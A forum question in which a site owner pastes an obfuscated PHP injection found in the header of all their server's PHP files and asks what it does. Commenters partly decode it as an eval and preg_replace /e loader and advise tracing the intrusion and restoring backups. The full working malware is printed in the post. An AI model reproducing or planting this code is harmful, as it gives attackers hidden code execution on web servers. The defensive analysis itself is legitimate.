# What exactly does this PHP exploit code

Tags: php, exploit

This exploit was in the header of all my PHP files on my server...any ideas what it does ?
Do you know how to batch remove it?

```
<?php 
$hngctorffh = 's%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udx5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x57822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjud<*QDU%x5c%x7860MPT7-NB**^#zsfvr#%x5c%x785cq%x5c%x7825)uftt%x5c%x7860{66~6<&w6<%x5c%x75c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x782%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x56]61]y33]68]y34]68]y33]257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81],*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827FSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x78&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%)54l}%x5c%x7827;%x5c%x7825!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]yj%x5c%x7822)gj6<^#Y#%x5%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},56#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x0QUUI7jsv%x5c%x78257UFH#%x5c%x7827rf%x782f7^#iubq#%x5c%x785cq%x5c%x7825%825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x5c%x78786<C%x5c%x7827&6<*rfstmfV%x5c%x787f<*XAZASV<*w%xz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6dx78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%445]43]321]464]284]364]ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P82f},;#-#}+;%x5c%x7825-qp%x5c%x7825uhofm%x5c%x7825:-5ppde:4:|:**#ppde25%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x556]y78]248]y83]256]y81]265]y72]254]y7~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x78c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x7r.985:52985-t.98]K4]65]D8]86]5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x*0f(-!#]y76]277]y72]265]y39]271]y83]2h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd7822#)fepmqyfA>2b%x5c%825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{function fjfgg($n){return ch0hA%x5c%x7827pd%x5c%x7825!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275~<#%x5c%x782f%x5c%x7825%x5c%<#64y]552]e7y]#>n%x5c%x7825<#37fw6*3qj%x5c%x78257>%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f*#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x78;ldpt%x5c%x7825}K;%x5c%<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7ussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275tt65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%825)n%x5c%x7825-#+I#)q%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7823:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN77]D4]82]K6]72]K9]78]K5]53]Kc#7825mm)%x5c%x7825%x5c%x7878:-!%x55)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeo787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tu87f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%25>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x78x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c8256<%x5c%x787fw6*%x5cy]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3ox7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,^%x5c%x782f%x5c%x7825r%x5c%x7c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{ex782f#M5]DgP5]D6#<%x5c%x7825fdy>60%x5c%x785c^>Ew:Qb:Qc:W%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!*y84]275]y83]273]y76]277#<%x5c%x782584]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x78TQcOc%x5c%x782f#00#W~!Yx5c%x7827&6<%x5c%x787fw6*%x5c%xef)#%x5c%x7824*<!%x5c%x7825kj:!**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]6utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f25fdy<Cb*[%x5c%x7825h!>!%x5c%x78g}%x5c%x7878;0]=])0#)U!%5c%x782f#7e:55946-tr.984:75983:48984:71]K9]x5c%x7825ggg)(0)%x5c%x782f+%x5c%x7825j>1<%x5c%x7825j=6[%58]y6g]273]y76]271]y7d]252]y74]2;uqpuft%x5c%x7860msvd}+;!>!}%x5*WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%6<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x782525!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x8]y76#<%x5c%x78e%x5c%x78b%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:>q%x5c%x7825<#762]67y]562]38y]572]4825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>h%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x78275597f-s.973:8297f:5297e:56-%x5c%x7878x7860QUUI&b%x5c%x7825!|!*)323zbek!7825>%x5c%x782fh%x5c%x7825:0%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x78HB%x5c%x7860SFTV%x5c%sbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%xx2c%163%x74%162%x5f%163%x70%154%x69%164%7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x750%x22%134%x78%62%x35%165%x3a%146%x21mg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x782x7860ufldpt}X;%x5c%x7fsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]8mgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x78253Ld]53]Kc]55Ld]55#*<%xc%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x6ovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*)fepdof.)fepdof.%x5c%x7x7825!<*qp%x5c%x7825-*.%27;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovx5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x782x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x78622)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x78x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:f:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}3gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!sr(ord($n)-1);} @error_reporting(0); preg_rep~!%x5c%x7825z!>2<!gps)5c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bdj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5cx5c%x7825:osvufs:~928>>%!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdyfbuf%x5c%x7860gvodujpo)##-!#;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x78#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tddrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%%x5c%x7825-#1GO%x5c%x76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }25V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%ofuopd%x5c%x7860ufh%x5c%x7860fmjg}[5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOF25!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tA%x5c%x7827doj%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsc%x7825z>3<!fmtf!%x5c%x5c%x7825)euhA)3of>2bd%x5c%x7825!<582f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobsx7824-%x5c%x7824!>!fyqmp825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x34}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]2x5c%x7827{**u%x5c%x7825-c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7%x7825z<jg!)%x5c%x7825z>>2*!%x556<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<opjudovg)!gj!|!*msv%x5c%x7825)}k%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273],*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%xsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272q]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x860msvd}R;*msv%x5c%x7825)}.;c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hc%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860c5)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubc%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!72]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#25<#g6R85,67R37,18R#>q%x5c%x78x78257-C)fepmqnjA%x5c%x7827&6<.fmjgy31]278]y3f]51L3]84]y31M6]y3e]81#%xH*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825isset($GLOBALS["%x61%156%x75%156%x61"])))) { ,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x787f_*#ujojRk3%x55c%x7824-%x5c%x7824-!%x5c%x78]281Ld]245]K2]285]Ke]5#%x5c%x782f#%x5c%x7825#%x5c%x782f#olace("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6bz+sfwjidsb%x5c%x7860bj+upcotn+qx7825z>2<!%x5c%x7825fmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x78sq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tp#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2pV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%87fw6*CW&)7gj6<*doj%x5c%$GLOBALS["%x61%156%x75%156%x61"]=1; fx7825)utjm6<%x5c%x783]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5~~~<ftmbg!osvufs!|ftmf!~<foopdXA%x5c%x7822)7gj6%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5x5c%x7878{**#k#)tutjyf%x5c%x786y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQe%x7825tmw)%x5c%x7825tww*7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x76%152%x66%147%x67%42%}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5cc%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x78/(.*)/epreg_replacevgtceydjcr';
$gifkmxealv = explode(chr((199 - 155)) , '8313,61,8565,45,9241,37,1894,27,6112,44,8832,69,5398,63,9922,21,4851,40,4927,37,3901,54,4377,32,5822,57,1921,25,4260,69,5718,40,7551,58,5516,42,726,41,9278,20,7417,37,483,64,1072,28,7641,49,3955,48,962,36,0,66,9440,22,286,22,660,66,2121,23,8013,56,7860,65,6242,62,998,36,5662,56,308,36,843,23,9148,69,1175,42,344,27,9217,24,8459,35,6917,21,3258,22,9348,67,8249,64,9784,70,1695,62,8725,21,3116,44,3786,31,2953,52,6740,35,2256,23,5093,21,7985,28,866,54,4189,31,2144,70,1946,64,7609,32,9415,25,8205,44,5334,42,6328,47,6819,44,9854,68,2720,49,8108,50,3848,53,8953,46,4484,66,4964,63,3540,57,2214,42,5879,66,6178,64,6613,21,1833,22,5581,24,7024,35,1794,39,4550,62,608,52,5558,23,7059,62,5027,66,2899,54,8901,32,7796,64,8999,51,5162,46,6060,52,4798,53,6775,44,4777,21,4649,34,1569,56,4329,48,180,63,1625,41,3005,64,7203,37,6462,37,1413,34,767,27,2474,56,6304,24,2530,57,5114,48,1447,34,3446,38,243,43,5461,55,8069,39,9097,51,1855,39,1100,27,3694,69,3160,54,8429,30,6687,53,9530,31,4710,67,5605,57,4034,24,7345,24,9050,47,8797,35,7925,60,7690,55,9561,69,3632,62,3597,35,2010,53,7454,66,1034,38,4683,27,2279,36,2315,36,2691,29,1217,53,5945,52,2091,30,8374,55,4448,36,3280,46,5997,63,7297,48,4157,32,920,42,8746,29,1481,51,7369,48,66,56,416,44,5208,66,3397,49,3326,42,7745,51,9722,62,6938,64,6434,28,2063,28,7121,24,3817,31,794,49,2769,67,9943,44,9630,68,3763,23,6555,58,6863,54,2351,55,8529,36,8158,47,7145,58,9698,24,4220,40,5758,64,4612,37,1666,29,8494,35,4058,43,2836,30,2634,57,3484,32,6499,56,1127,48,8775,22,5376,22,371,45,4003,31,6375,59,1356,57,5274,60,9298,50,1270,23,122,58,9987,66,3368,29,7240,57,4891,36,4409,39,8610,58,9462,68,10053,53,3516,24,6156,22,4128,29,3214,44,7520,31,7002,22,8933,20,1293,63,2866,33,2406,68,8668,57,547,61,3069,47,4101,27,1757,37,1532,37,460,23,2587,47,6634,53');
$jqasilvkah = substr($hngctorffh, (70221 - 60115) , (46 - 39));

if (!function_exists('dkoxpnkcvz'))
    {
    function dkoxpnkcvz($uquevssmbb, $gbjfyuptqv)
        {
        $rafkiwpxdo = NULL;
        for ($bjfdqjrsbp = 0; $bjfdqjrsbp < (sizeof($uquevssmbb) / 2); $bjfdqjrsbp++)
            {
            $rafkiwpxdo.= substr($gbjfyuptqv, $uquevssmbb[($bjfdqjrsbp * 2) ], $uquevssmbb[($bjfdqjrsbp * 2) + 1]);
            }

        return $rafkiwpxdo;
        };
    }

$jbwtpislvw = "\x20\57\x2a\40\x68\157\x7a\165\x61\154\x68\162\x6a\165\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\62\x37\55\x39\60\x29\51\x2c\40\x63\150\x72\50\x28\66\x33\60\x2d\65\x33\70\x29\51\x2c\40\x64\153\x6f\170\x70\156\x6b\143\x76\172\x28\44\x67\151\x66\153\x6d\170\x65\141\x6c\166\x2c\44\x68\156\x67\143\x74\157\x72\146\x66\150\x29\51\x29\73\x20\57\x2a\40\x7a\164\x65\144\x70\145\x73\170\x77\147\x20\52\x2f\40";
$clpjwpghsa = substr($hngctorffh, (42911 - 32798) , (54 - 42));
$clpjwpghsa($jqasilvkah, $jbwtpislvw, NULL);
$clpjwpghsa = $jbwtpislvw;
$clpjwpghsa = (471 - 350);
$hngctorffh = $clpjwpghsa - 1;
```

?>

Comment: You can try to batch remove it but you ***MUST*** find how it get there in first place.

Comment: Removing exploits manually is not a guaranteed fix. Ask your hosting provider to restore your site from known good backups.

Comment: it's an exploit of course, and I've already cleaned all involved files. In the meantime I'm trying to understand what this malicious code does...

    $jbwtpislvw = /* hozualhrju */ eval(str_replace(chr((127-90)), chr((630-538)), dkoxpnkcvz($gifkmxealv,$hngctorffh))); /* ztedpesxwg */

Comment: Thanks @Tuga, it's an exploit of course, and I've already cleaned all involved files. In the meantime I'm trying to understand what this malicious code does...

`$jbwtpislvw = /* hozualhrju */ eval(str_replace(chr((127-90)), chr((630-538)), dkoxpnkcvz($gifkmxealv,$hngctorffh))); /* ztedpesxwg */`

`$gifkmxealv` is an array of number
`$jqasilvkah = /(.*)/e`

The first 
`$clpjwpghsa = preg_replace`

Comment: Can you precise which versions of CMS, database, and plugins are you using?